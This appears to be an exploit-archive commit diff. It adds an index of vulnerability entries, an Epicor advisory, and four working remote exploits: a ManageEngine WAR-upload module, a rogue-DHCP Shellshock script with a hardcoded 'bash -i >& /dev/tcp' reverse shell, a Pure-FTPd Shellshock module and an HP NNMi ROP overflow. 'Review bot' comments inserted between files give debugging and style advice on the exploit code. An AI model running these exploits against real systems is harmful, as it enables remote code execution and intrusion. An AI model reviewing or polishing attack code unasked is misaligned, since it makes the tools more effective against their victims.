diff --git a/files.csv b/files.csv
index da5d359a3..4e8b2d94a 100755
--- a/files.csv
+++ b/files.csv
@@ -31367,3 +31367,29 @@ id,file,description,date,author,platform,type,port
34836,platforms/windows/remote/34836.py,"Notepad++ 5.8.2 'libtidy.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-12,anT!-Tr0J4n,windows,remote,0
34837,platforms/php/webapps/34837.txt,"Joomla! 'com_jstore' Component 'controller' Parameter Local File Include Vulnerability",2010-10-13,jos_ali_joe,php,webapps,0
34838,platforms/windows/remote/34838.c,"Torrent DVD Creator 'quserex.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-13,anT!-Tr0J4n,windows,remote,0
+34840,platforms/php/webapps/34840.txt,"Ronny CMS 1.1 r935 Multiple HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0
+34841,platforms/php/webapps/34841.txt,"PluXml 5.0.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0
+34842,platforms/php/webapps/34842.txt,"TWiki <= 5.0 bin/view rev Parameter XSS",2010-10-14,"DOUHINE Davy",php,webapps,0
+34843,platforms/php/webapps/34843.txt,"TWiki <= 5.0 bin/login Multiple Parameter XSS",2010-10-14,"DOUHINE Davy",php,webapps,0
+34844,platforms/windows/remote/34844.c,"STDU Explorer 1.0.201 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-15,anT!-Tr0J4n,windows,remote,0
+34845,platforms/php/webapps/34845.txt,"PHP Photo Vote 1.3F 'page' Parameter Cross Site Scripting Vulnerability",2009-08-07,Moudi,php,webapps,0
+34846,platforms/windows/remote/34846.txt,"httpdx 1.4.5 dot Character Remote File Disclosure Vulnerability",2009-10-09,Dr_IDE,windows,remote,0
+34847,platforms/php/webapps/34847.txt,"PHP Easy Shopping Cart 3.1R 'subitems.php' Cross Site Scripting Vulnerability",2009-08-07,Moudi,php,webapps,0
+34848,platforms/windows/remote/34848.c,"1CLICK DVD Converter 2.1.7.1 Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2010-10-15,anT!-Tr0J4n,windows,remote,0
+34849,platforms/php/webapps/34849.txt,"AdvertisementManager 3.1 'req' Parameter Local and Remote File Include Vulnerabilities",2010-01-19,indoushka,php,webapps,0
+34850,platforms/php/webapps/34850.txt,"eXV2 CMS Multiple Cross Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,php,webapps,0
+34852,platforms/php/webapps/34852.txt,"HTTP File Server 2.3a, 2.3b, 2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",php,webapps,80
+34853,platforms/windows/remote/34853.c,"PowerDVD 5.0.1107 'trigger.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,"Inj3cti0n P4ck3t",windows,remote,0
+34854,platforms/php/webapps/34854.txt,"All In One Wordpress Firewall 3.8.3 - Persistent XSS Vulnerability",2014-10-02,Vulnerability-Lab,php,webapps,80
+34855,platforms/windows/dos/34855.pl,"ALPHA Player 2.4 '.bmp' File Buffer Overflow Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0
+34856,platforms/windows/remote/34856.py,"Kolibri Webserver 2.0 Buffer Overflow with EMET 5.0 and EMET 4.1 Partial Bypass",2014-10-02,tekwizz123,windows,remote,80
+34857,platforms/windows/dos/34857.txt,"TeamSpeak Client 3.0.14 - Buffer Overflow Vulnerability",2014-10-02,"SpyEye and Christian Galeon",windows,dos,0
+34858,platforms/php/webapps/34858.txt,"RBS Change Complet Open Source 3.6.8 - CSRF Vulnerability",2014-10-02,"Krusty Hack",php,webapps,80
+34860,platforms/linux/remote/34860.py,"GNU bash 4.3.11 Environment Variable dhclient Exploit",2014-10-02,@0x00string,linux,remote,0
+34861,platforms/php/webapps/34861.txt,"PHPCompta/NOALYSS 6.7.1 5638 - Remote Command Execution",2014-10-02,Portcullis,php,webapps,80
+34862,platforms/linux/remote/34862.rb,"Pure-FTPd External Authentication Bash Environment Variable Code Injection",2014-10-02,metasploit,linux,remote,21
+34863,platforms/php/webapps/34863.txt,"TestLink 1.9.11 - Multiple SQL Injection Vulnerabilities",2014-10-02,Portcullis,php,webapps,80
+34864,platforms/asp/webapps/34864.txt,"Epicor Enterprise 7.4 - Multiple Vulnerabilities",2014-10-02,"Fara Rustein",asp,webapps,443
+34865,platforms/multiple/webapps/34865.txt,"Moab < 7.2.9 - Authorization Bypass",2014-10-02,"MWR InfoSecurity",multiple,webapps,0
+34866,platforms/linux/remote/34866.rb,"HP Network Node Manager I PMD Buffer Overflow",2014-10-02,metasploit,linux,remote,7426
+34867,platforms/java/remote/34867.rb,"ManageEngine OpManager / Social IT Arbitrary File Upload",2014-10-02,"Pedro Ribeiro",java,remote,80
diff --git a/platforms/asp/webapps/34864.txt b/platforms/asp/webapps/34864.txt
new file mode 100755
index 000000000..39367268f
--- /dev/null
+++ b/platforms/asp/webapps/34864.txt
@@ -0,0 +1,72 @@
+"Epicor Enterprise vulnerabilities"
+
+- Affected vendor: Epicor Software Corporation
+- Affected system: Epicor Enterprise - Version 7.4
+- Vendor disclosure date: May 13th, 2014
+- Public disclosure date: September 30th, 2014
+- Status: Fixed
+
+- Associated CVEs:
+
+ 1) CVE-2014-4311
+ Password values not masked appropriately:
+ Even though the application appears to be masking the affected password values
+in the database connection and email settings page, it is possible to access
+their content by observing the HTML code.
+
+ Affected password values:
+ - “Database Connection”
+ - “E-mail Connection”
+
+ Associated CAPEC:
+ CAPEC-167: Lifting Sensitive Data from the Client -
+https://capec.mitre.org/data/definitions/167.html
+
+ Associated CWE:
+ CWE-200: Information Exposure - http://cwe.mitre.org/data/definitions/200.html
+
+ 2) CVE-2014-4312
+ Persistent and reflective cross-site scripting (XSS) attacks possible:
+ The identified website is vulnerable to persistent and reflective cross-site
+scripting. Script injection is a weakness within an application, and is due to
+insufficient validation of the input data (i.e. input data being sent from the
+user/presentation layer) and output encoding allowing dynamic execution of
+scripts on the application front end resulting in anomalous/abnormal behaviour
+of the application.
+
+ Example of affected functionalities for persistent XSS:
+ - 1. While viewing Order details, and injecting a malicious payload on the
+"Notes" section.
+ - 2. While modifying an “Order to consume” and injecting a malicious payload
+on the "Description" section.
+ - 3. While observing the “Favorites” section and and injecting a malicious
+payload on the “Favorites name” section.
+ Example of an injected payload:
+
+ Example of affected URLs for reflective XSS:
+ - 1.
+https://XXXXX/Procurement/EKPHTML/search_item_bt.asp?RecordsRequested=Yes&FiltPartNo=&FiltSupplier=-1&FiltKeyword=
+ - 2.
+https://XXXXX/Procurement/EKPHTML/EnterpriseManager/Budget/ImportBudget_fr.asp?Act=dtt">
+ - 3. https://XXXXX
+/Procurement/EKPHTML/EnterpriseManager/UserSearchDlg.asp?hdnPageName=UserSearch&hdnOpenerFormName=PrefApp&hdnApproverFieldName=temp1&hdnApproverIDFieldName=temp2&hdnUserID=200&hdnOpener=Test">
+ - 4.
+https://XXXXX/Procurement/EKPHTML/EnterpriseManager/UserSearchDlg.asp?hdnOpenerFormName=PrefApp&hdnApproverFieldName=">
+ - 5.
+https://XXXXX/Procurement/EKPHTML/EnterpriseManager/Codes.asp?INTEGRATED=XSS">-->
+
+ Associated CAPEC:
+ CAPEC-32: Embedding Scripts in HTTP Query Strings -
+https://capec.mitre.org/data/definitions/32.html
+
+ Associated CWE:
+ CWE-79: Improper Neutralization of Input During Web Page Generation
+('Cross-site Scripting') - http://cwe.mitre.org/data/definitions/79.html
+
+- Available fix:
+ Epicor Enterprise Hotfix: FS74SP6_HotfixTL054181
+
+- Credit:
+ These vulnerabilities were discovered by Fara Rustein.
+ If you have any questions, comments, concerns, updates or suggestions please
+contact Fara Rustein (TW: @fararustein).
\ No newline at end of file
diff --git a/platforms/java/remote/34867.rb b/platforms/java/remote/34867.rb
new file mode 100755
index 000000000..7256dabc3
--- /dev/null
+++ b/platforms/java/remote/34867.rb
@@ -0,0 +1,154 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'ManageEngine OpManager / Social IT Arbitrary File Upload',
+ 'Description' => %q{
+ This module exploits a file upload vulnerability in ManageEngine OpManager and Social IT.
+ The vulnerability exists in the FileCollector servlet which accepts unauthenticated
+ file uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on
+ version 11.0 of SocialIT for Windows and Linux.
+ },
+ 'Author' =>
+ [
+ 'Pedro Ribeiro ', # Vulnerability Discovery and Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2014-6034' ],
+ [ 'OSVDB', '112276' ],
+ [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt' ],
+ [ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ]
+ ],
+ 'Privileged' => true,
+ 'Platform' => 'java',
+ 'Arch' => ARCH_JAVA,
+ 'Targets' =>
+ [
+ [ 'OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal', { } ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Sep 27 2014'))
+
+ register_options(
+ [
+ Opt::RPORT(80),
+ OptInt.new('SLEEP',
+ [true, 'Seconds to sleep while we wait for WAR deployment', 15]),
+ ], self.class)
+ end
+
+ def check
+ res = send_request_cgi({
+ 'uri' => normalize_uri("/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector"),
+ 'method' => 'GET'
+ })
+
+ # A GET request on this servlet returns "405 Method not allowed"
+ if res and res.code == 405
+ return Exploit::CheckCode::Detected
+ end
+
+ return Exploit::CheckCode::Safe
+ end
+
+
+ def upload_war_and_exec(try_again, app_base)
+ tomcat_path = '../../../tomcat/'
+ servlet_path = '/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector'
+
+ if try_again
+ # We failed to obtain a shell. Either the target is not vulnerable or the Tomcat configuration
+ # does not allow us to deploy WARs. Fix that by uploading a new context.xml file.
+ # The file we are uploading has the same content apart from privileged="false" and lots of XML comments.
+ # After replacing the context.xml file let's upload the WAR again.
+ print_status("#{peer} - Replacing Tomcat context file")
+ send_request_cgi({
+ 'uri' => normalize_uri(servlet_path),
+ 'method' => 'POST',
+ 'data' => %q{WEB-INF/web.xml},
+ 'ctype' => 'application/xml',
+ 'vars_get' => {
+ 'regionID' => tomcat_path + "conf",
+ 'FILENAME' => "context.xml"
+ }
+ })
+ else
+ # We need to create the upload directories before our first attempt to upload the WAR.
+ print_status("#{peer} - Creating upload directories")
+ bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
+ send_request_cgi({
+ 'uri' => normalize_uri(servlet_path),
+ 'method' => 'POST',
+ 'data' => rand_text_alphanumeric(4 + rand(32 - 4)),
+ 'ctype' => 'application/xml',
+ 'vars_get' => {
+ 'regionID' => "",
+ 'FILENAME' => bogus_file
+ }
+ })
+ register_files_for_cleanup("state/archivedata/zip/" + bogus_file)
+ end
+
+ war_payload = payload.encoded_war({ :app_name => app_base }).to_s
+
+ print_status("#{peer} - Uploading WAR file...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(servlet_path),
+ 'method' => 'POST',
+ 'data' => war_payload,
+ 'ctype' => 'application/octet-stream',
+ 'vars_get' => {
+ 'regionID' => tomcat_path + "webapps",
+ 'FILENAME' => app_base + ".war"
+ }
+ })
+
+ # The server either returns a 500 error or a 200 OK when the upload is successful.
+ if res and (res.code == 500 or res.code == 200)
+ print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s +
+ " seconds for deployment")
+ sleep(datastore['SLEEP'])
+ else
+ fail_with(Exploit::Failure::Unknown, "#{peer} - WAR upload failed")
+ end
+
+ print_status("#{peer} - Executing payload, wait for session...")
+ send_request_cgi({
+ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
+ 'method' => 'GET'
+ })
+ end
+
+
+ def exploit
+ app_base = rand_text_alphanumeric(4 + rand(32 - 4))
+
+ upload_war_and_exec(false, app_base)
+ register_files_for_cleanup("tomcat/webapps/" + "#{app_base}.war")
+
+ sleep_counter = 0
+ while not session_created?
+ if sleep_counter == datastore['SLEEP']
+ print_error("#{peer} - Failed to get a shell, let's try one more time")
+ upload_war_and_exec(true, app_base)
+ return
+ end
+
+ sleep(1)
+ sleep_counter += 1
+ end
+ end
+end
\ No newline at end of file
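Review bot: The retry loop at the end of `exploit` is written as `while not session_created?` with an exact `sleep_counter == datastore['SLEEP']` comparison; the idiomatic Ruby form is `until session_created?`, and `>=` would keep the bound meaningful if the counter were ever advanced by more than one. Separately, the header comment `# This module requires Metasploit: http//metasploit.com/download` is missing the colon after `http`; the same typo appears in the headers of 34862.rb and 34866.rb in this commit. Both are style/documentation points and do not change what the module does.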
diff --git a/platforms/linux/remote/34860.py b/platforms/linux/remote/34860.py
new file mode 100755
index 000000000..ff25e8c04
--- /dev/null
+++ b/platforms/linux/remote/34860.py
@@ -0,0 +1,74 @@
+#!/usr/bin/python
+# Exploit Title: dhclient shellshocker
+# Google Dork: n/a
+# Date: 10/1/14
+# Exploit Author: @0x00string
+# Vendor Homepage: gnu.org
+# Software Link: http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
+# Version: 4.3.11
+# Tested on: Ubuntu 14.04.1
+# CVE : CVE-2014-6277,CVE-2014-6278,CVE-2014-7169,CVE-2014-7186,CVE-2014-7187
+# ______ ______ ______ _
+# / __ | / __ |/ __ | _ (_)
+#| | //| |_ _| | //| | | //| | ___| |_ ____ _ ____ ____ ___
+#| |// | ( \ / ) |// | | |// | |/___) _) / ___) | _ \ / _ |/___)
+#| /__| |) X (| /__| | /__| |___ | |__| | | | | | ( ( | |___ |
+# \_____/(_/ \_)\_____/ \_____/(___/ \___)_| |_|_| |_|\_|| (___/
+# (_____|
+# _ _ _ _
+# | | | | (_) _
+# _ | | | _ ____| |_ ____ ____ | |_
+# / || | || \ / ___) | |/ _ ) _ \| _)
+#( (_| | | | ( (___| | ( (/ /| | | | |__
+# \____|_| |_|\____)_|_|\____)_| |_|\___)
+#
+# _ _ _ _ _
+# | | | | | | | | |
+# ___| | _ ____| | | ___| | _ ___ ____| | _ ____ ____
+# /___) || \ / _ ) | |/___) || \ / _ \ / ___) | / ) _ )/ ___)
+#|___ | | | ( (/ /| | |___ | | | | |_| ( (___| |< ( (/ /| |
+#(___/|_| |_|\____)_|_(___/|_| |_|\___/ \____)_| \_)____)_|
+
+# this buddy listens for clients performing a DISCOVER, a later version will exploit periodic REQUESTs, which can sometimes be prompted by causing IP conflicts
+# once a broadcast DISCOVER packet has been detected, the XID, MAC and requested IP are pulled from the pack and a corresponding OFFER and ACK are generated and pushed out
+# The client is expected to reject the offer in preference of their known DHCP server, but will still process the packet, triggering the vulnerability.
+# can use option 114, 56 or 61, though is hardcoded to use 114 as this is merely a quick and dirty example.
+
+import socket, struct
+def HexToByte( hexStr ):
+ b = []
+ h = ''.join( h.split(" ") )
+ for i in range(0, len(h), 2):
+ b.append( chr( int (h[i:i+2], 16 ) ) )
+ return ''.join( b )
+
+rport = 68
+lport = 67
+
+bsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+
+bsock.bind(("", lport))
+
+while True:
+
+ OP = "72" # 56, Message - RFC 1533,2132. 61, Client-identifier - RFC 1533,2132,4361 or 114, URL - RFC 3679 are currently known to work, here we use 114
+ URL = "() { :;}; bash -i >& /dev/tcp/10.0.0.1/1337 0>&1".encode("hex")
+ URLLEN = chr(len(URL) / 2).encode("hex")
+ END = "03040a000001ff"
+ broadcast_get, (bcrhost, rport) = bsock.recvfrom(2048)
+ hexip = broadcast_get[245:249]
+ rhost = str(ord(hexip[0])) + "." + str(ord(hexip[1])) + "." + str(ord(hexip[2])) + "." + str(ord(hexip[3]))
+ XID = broadcast_get[4:8].encode("hex")
+ chaddr = broadcast_get[29:34].encode("hex")
+ print "[+]\tgot broadcast with XID " + XID + " requesting IP " + rhost + "\n"
+ OFFER = "02010600" + XID + "00000000000000000a0000430a0000010000000000" + chaddr + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010236040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65" + OP + URLLEN + URL + END
+ OFFER_BYTES = HexToByte(OFFER)
+ ACK = "02010600" + XID + "00000000000000000a0000430a0000010000000000" + chaddr + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010536040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65" + OP + URLLEN + URL + END
+ ACK_BYTES = HexToByte(ACK)
+ print "[+]\tsending evil offer\n"
+ sock.sendto(OFFER_BYTES, (rhost, rport))
+ broadcast_get2 = bsock.recvfrom(2048)
+ print "[+]\tassuming request was received, sending ACK\n"
+ sock.sendto(ACK_BYTES, (rhost, rport))
+
diff --git a/platforms/linux/remote/34862.rb b/platforms/linux/remote/34862.rb
new file mode 100755
index 000000000..e41879a6b
--- /dev/null
+++ b/platforms/linux/remote/34862.rb
@@ -0,0 +1,116 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::Ftp
+ include Msf::Exploit::CmdStager
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection',
+ 'Description' => %q(
+ This module exploits the code injection flaw known as shellshock which
+ leverages specially crafted environment variables in Bash. This exploit
+ specifically targets Pure-FTPd when configured to use an external
+ program for authentication.
+ ),
+ 'Author' =>
+ [
+ 'Stephane Chazelas', # Vulnerability discovery
+ 'Frank Denis', # Discovery of Pure-FTPd attack vector
+ 'Spencer McIntyre' # Metasploit module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2014-6271'],
+ ['OSVDB', '112004'],
+ ['EDB', '34765'],
+ ['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc']
+ ],
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ 'Space' => 2048
+ },
+ 'Targets' =>
+ [
+ [ 'Linux x86',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X86,
+ 'CmdStagerFlavor' => :printf
+ }
+ ],
+ [ 'Linux x86_64',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X86_64,
+ 'CmdStagerFlavor' => :printf
+ }
+ ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'PrependFork' => true
+ },
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Sep 24 2014'))
+ register_options(
+ [
+ Opt::RPORT(21),
+ OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin'])
+ ], self.class)
+ deregister_options('FTPUSER', 'FTPPASS')
+ end
+
+ def check
+ # this check method tries to use the vulnerability to bypass the login
+ username = rand_text_alphanumeric(rand(20) + 1)
+ random_id = (rand(100) + 1)
+ command = "echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end"
+ if send_command(username, command) =~ /^2\d\d ok./i
+ return CheckCode::Safe if banner !~ /pure-ftpd/i
+ disconnect
+
+ command = "echo auth_ok:0; echo end"
+ if send_command(username, command) =~ /^5\d\d login authentication failed/i
+ return CheckCode::Vulnerable
+ end
+ end
+ disconnect
+
+ CheckCode::Safe
+ end
+
+ def execute_command(cmd, _opts)
+ cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
+ username = rand_text_alphanumeric(rand(20) + 1)
+ send_command(username, cmd)
+ end
+
+ def exploit
+ # Cannot use generic/shell_reverse_tcp inside an elf
+ # Checking before proceeds
+ if generate_payload_exe.blank?
+ fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
+ end
+
+ execute_cmdstager(linemax: 500)
+ handler
+ end
+
+ def send_command(username, cmd)
+ cmd = "() { :;}; #{datastore['RPATH']}/sh -c \"#{cmd}\""
+ connect
+ send_user(username)
+ password_result = send_pass(cmd)
+ disconnect
+ password_result
+ end
+end
\ No newline at end of file
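Review bot: `check` is not a passive probe: the `command` it builds (`echo auth_ok:1; ...`) is pushed through the external-authentication path via `send_command`, so on a vulnerable host a `check` run completes a login as a randomly named user and leaves authentication-success entries in the FTP server's logs. That should be stated above the method, e.g. `# NOTE: intrusive check - performs a login through the injection rather than a banner match`, so operators know what a `check` does before running it. Also, `send_command` already calls `disconnect` before returning its result, so the explicit `disconnect` calls inside `check` after each attempt are redundant and the connection lifecycle would be clearer handled in one place. Finally, `execute_command` mutates its `cmd` argument in place with `gsub!`; `cmd = cmd.gsub('chmod', "#{datastore['RPATH']}/chmod")` avoids surprising the caller that owns the string.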
diff --git a/platforms/linux/remote/34866.rb b/platforms/linux/remote/34866.rb
new file mode 100755
index 000000000..5af7a53a0
--- /dev/null
+++ b/platforms/linux/remote/34866.rb
@@ -0,0 +1,229 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::Udp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'HP Network Node Manager I PMD Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack buffer overflow in HP Network Node Manager I (NNMi). The
+ vulnerability exists in the pmd service, due to the insecure usage of functions like
+ strcpy and strcat while handling stack_option packets with user controlled data. In
+ order to bypass ASLR this module uses a proto_tbl packet to leak an libov pointer from
+ the stack and finally build the rop chain to avoid NX.
+ },
+ 'Author' =>
+ [
+ 'd(-_-)b', # Vulnerability discovery
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2014-2624'],
+ ['ZDI', '14-305']
+ ],
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00",
+ 'Space' => 3000,
+ 'DisableNops' => true,
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd cmd_bash',
+ 'RequiredCmd' => 'generic python perl openssl bash-tcp gawk'
+ }
+ },
+ 'Arch' => ARCH_CMD,
+ 'Platform' => 'unix',
+ 'Targets' =>
+ [
+ ['Automatic', {}],
+ ['HP NNMi 9.10 / CentOS 5',
+ {
+ # ptr to .rodata with format specifier
+ #.rodata:0003BE86 aS_1 db '%s',0
+ 'ov_offset' => 0x3BE86,
+ :rop => :rop_hp_nnmi_9_10
+ }
+ ],
+ ['HP NNMi 9.20 / CentOS 6',
+ {
+ # ptr to .rodata with format specifier
+ #.rodata:0003C2D6 aS_1 db '%s',0
+ 'ov_offset' => 0x3c2d8,
+ :rop => :rop_hp_nnmi_9_20
+ }
+ ]
+ ],
+ 'Privileged' => false, # true for HP NNMi 9.10, false for HP NNMi 9.20
+ 'DisclosureDate' => 'Sep 09 2014',
+ 'DefaultTarget' => 0
+ ))
+
+ register_options([ Opt::RPORT(7426) ], self.class)
+ end
+
+ def check
+ header = [
+ 0x2a5, # pmdmgr_init pkt
+ 0x3cc, # signature
+ 0xa0c, # signature
+ 0xca8 # signature
+ ].pack("V")
+
+ data = "\x00" * (0xfa4 - header.length)
+
+ pkt = header + data
+
+ connect_udp
+ udp_sock.put(pkt)
+ res = udp_sock.timed_read(8, 1)
+ if res.blank?
+ # To mitigate MacOSX udp sockets behavior
+ # see https://dev.metasploit.com/redmine/issues/7480
+ udp_sock.put(pkt)
+ res = udp_sock.timed_read(8)
+ end
+ disconnect_udp
+
+ if res.blank?
+ return Exploit::CheckCode::Unknown
+ elsif res.length == 8 && res.unpack("V").first == 0x2a5
+ return Exploit::CheckCode::Detected
+ else
+ return Exploit::CheckCode::Unknown
+ end
+ end
+
+ def exploit
+ connect_udp
+ # info leak with a "proto_tbl" packet
+ print_status("Sending a 'proto_tbl' request...")
+ udp_sock.put(proto_tbl_pkt)
+
+ res = udp_sock.timed_read(13964, 1)
+ if res.blank?
+ # To mitigate MacOSX udp sockets behavior
+ # see https://dev.metasploit.com/redmine/issues/7480
+ udp_sock.put(proto_tbl_pkt)
+ res = udp_sock.timed_read(13964)
+ end
+
+ if res.blank?
+ fail_with(Failure::Unknown, "Unable to get a 'proto_tbl' response...")
+ end
+
+ if target.name == 'Automatic'
+ print_status("Fingerprinting target...")
+ my_target = auto_target(res)
+ fail_with(Failure::NoTarget, "Unable to autodetect target...") if my_target.nil?
+ else
+ my_target = target
+ fail_with(Failure::Unknown, "Unable to leak libov base address...") unless find_ov_base(my_target, res)
+ end
+
+ print_good("Exploiting #{my_target.name} with libov base address at 0x#{@ov_base.to_s(16)}...")
+
+ # exploit with a "stack_option_pkt" packet
+ udp_sock.put(stack_option_pkt(my_target, @ov_base))
+
+ disconnect_udp
+ end
+
+ def rop_hp_nnmi_9_10(ov_base)
+ rop = rand_text_alpha(775)
+ rop << [0x808d7c1].pack("V") # pop ebx ; pop ebp ; ret
+ rop << [ov_base + 0x481A8].pack("V") # ebx: libov .got
+ rop << [0x8096540].pack("V") # ptr to .data where user controlled string will be stored:
+ # "PMD Stack option specified, but stack not available (user_controlled)"
+ rop << [0x808d7c2].pack("V") # pop ebp # ret
+ rop << [0x08096540 + 4732].pack("V") # ebp: ptr to our controlled data in .data (+0x1028 to compensate)
+ rop << [ov_base + 0x1D692].pack("V") # ptr to 'call _system' sequence:
+ #.text:0001D692 lea eax, [ebp+dest]
+ #.text:0001D698 push eax ; command
+ #.text:0001D699 call _system
+ rop
+ end
+
+ def rop_hp_nnmi_9_20(ov_base)
+ rop = rand_text_alpha(775)
+ rop << [0x808dd70].pack("V") # pop eax ; pop ebx ; pop ebp ; ret
+ rop << [0xf7f61cd0 + ov_base + 0x1dae6].pack("V") # eax: ptr to 'call _system' sequence
+ #.text:0001DAE6 lea eax, [ebp+dest] (dest = -0x1028)
+ #.text:0001DAEC push eax ; command
+ #.text:0001DAED call _system
+ rop << [0x08097160].pack("V") # ebx: ptr to .data where user controlled string will be stored:
+ # "PMD Stack option specified, but stack not available (user_controlled)"
+ rop << rand_text_alpha(4) # ebp: padding
+ rop << [0x804fb86].pack("V") # add eax 0x809e330 ; add ecx ecx ; ret (control eax)
+ rop << [0x8049ac4].pack("V") # xchg eax, edi ; ret
+ rop << [0x808dd70].pack("V") # pop eax ; pop ebx ; pop ebp ; ret
+ rop << [0xf7f61cd0 + ov_base + 0x47f1c].pack("V") # eax: libov .got base
+ rop << rand_text_alpha(4) # ebx: padding
+ rop << [0x8097160 + 4764].pack("V") # ebp: ptr to our controlled data in .data (+0x1028 to compensate)
+ rop << [0x804fb86].pack("V") # add eax 0x809e330 ; add ecx ecx ; ret (control eax)
+ rop << [0x805a58d].pack("V") # xchg ebx eax ; and eax 0xc4830001 ; and cl cl ; ret (ebx: libov .got)
+ rop << [0x8049ac4].pack("V") # xchg eax, edi ; ret ; (eax: call to system sequence from libov)
+ rop << [0x80528BC].pack("V") # jmp eax
+
+ rop
+ end
+
+ def stack_option_pkt(t, ov_base)
+ hdr = [0x2a9].pack("V") # stack_option packet
+ data = "-SA" # stack name (invalid one 'A')
+ data << ";" # separator
+ data << self.send(t[:rop], ov_base) # malformed stack options
+ data << payload.encoded
+ data << ";\n"
+ data << "\x00" * (0xfa4 - data.length - hdr.length)
+
+ hdr + data
+ end
+
+ def proto_tbl_pkt
+ hdr = [0x2aa].pack("V") # proto_tbl packet
+ data = "\x00" * (0xfa4 - hdr.length)
+
+ hdr + data
+ end
+
+ def base(address, offset)
+ address - offset
+ end
+
+ def find_ov_base(t, data)
+ print_status("Searching #{t.name} pointers...")
+ i = 0
+ data.unpack("V*").each do |int|
+ if base(int, t['ov_offset']) % 0x1000 == 0
+ print_status("Pointer 0x#{int.to_s(16)} found at offset #{i * 4}")
+ @ov_base = base(int, t['ov_offset'])
+ return true
+ end
+ i = i + 1
+ end
+
+ false
+ end
+
+ def auto_target(data)
+ targets.each do |t|
+ next if t.name == 'Automatic'
+ if find_ov_base(t, data)
+ return t
+ end
+ end
+
+ nil
+ end
+
+end
\ No newline at end of file
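Review bot: The second target's comment and constant disagree: the comment reads `#.rodata:0003C2D6 aS_1 db '%s',0` while the value is `'ov_offset' => 0x3c2d8`, two bytes higher, whereas the 9.10 target's comment `0003BE86` matches its `0x3BE86` exactly. One of the two is presumably stale; either the comment should be corrected or the derivation documented, because `find_ov_base` relies on this offset aligning a leaked pointer to a 0x1000 boundary and a wrong value only surfaces as the `NoTarget`/`Unknown` failure in `exploit`, not as an error pointing at the constant. As a style point, `find_ov_base` keeps a manual `i = i + 1` counter beside `.each`; `data.unpack("V*").each_with_index do |int, i|` expresses the same loop with the index supplied and leaves `i * 4` in the status line unchanged. The result is also handed back through the `@ov_base` side effect and read in `exploit`; returning the base (or `nil`) would make that data flow explicit.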
